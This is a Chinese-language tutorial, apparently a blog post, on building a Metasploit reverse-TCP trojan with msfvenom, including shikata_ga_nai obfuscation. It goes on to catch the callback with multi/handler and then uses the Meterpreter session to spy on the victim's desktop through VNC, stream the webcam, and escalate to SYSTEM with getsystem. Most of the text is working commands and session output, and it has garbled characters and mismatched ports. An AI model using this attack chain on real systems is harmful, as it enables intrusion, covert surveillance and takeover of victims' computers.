Meterpreter(MSF)payload攻擊載荷,反彈實驗。

制作木馬
攻擊載荷的概念類似反彈shell,使用msfvenom -v
可以查看操作幫助
msfvenom -l
可以查看當(dāng)前可以使用的攻擊載荷列表
生成一個反彈木馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.136.131 lport=666 -f exe -e x86/shikata_ga_nai -i 8 -o muma2.exe
-p windows/meterpreter/reverse_tcp使用反彈模式
lhost=192.168.136.131我的IP
lport=666我要監(jiān)聽的端口
-f exe生成exe文件
-e x86/shikata_ga_nai編碼混淆方式
-i 8編碼混淆次數(shù)
-o muma.exe生成的文件
當(dāng)然,簡單的編碼混淆是過不了殺毒軟件的。

進入監(jiān)聽模式
msf > use exploit/multi/handler
監(jiān)聽的payload類型
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
監(jiān)聽的IP
msf exploit(multi/handler) > set lhost 192.168.136.131lhost => 192.168.136.131
監(jiān)聽的端口
msf exploit(multi/handler) > set lport 666lport => 444
開始監(jiān)聽
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.136.131:444 [*] Sending stage (179779 bytes) to 192.168.136.133
主機上線
[*] Meterpreter session 1 opened (192.168.136.131:444 -> 192.168.136.133:1027) at 2018-05-05 20:10:43 +0800
VNC桌面實時監(jiān)控
meterpreter > run vnc
Connected to RFB server, using protocol version 3.8Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "www-a8d99aa2ea1"

查看在線的攝像頭
meterpreter > webcam_list
1:
實時監(jiān)控攝像頭
meterpreter > webcam_stream [*] Starting...[*] Preparing player...[*] Opening player at: ebSRJuzI.html

查看系統(tǒng)信息
meterpreter > sysinfo
Computer : WWW-A8D99AA2EA1
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2Meterpreter : x86/windows
查看當(dāng)前權(quán)限
meterpreter > getuid
Server username: WWW-A8D99AA2EA1\Administrator
權(quán)限提升
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
完畢
以上就是Meterpreter(MSF)payload攻擊載荷的簡單反彈實驗,msf作為大型攻擊框架,實際上可以攻擊安卓、web系統(tǒng)、linux等等,幫助文檔也比較詳細,英文基礎(chǔ)好上手毫無壓力。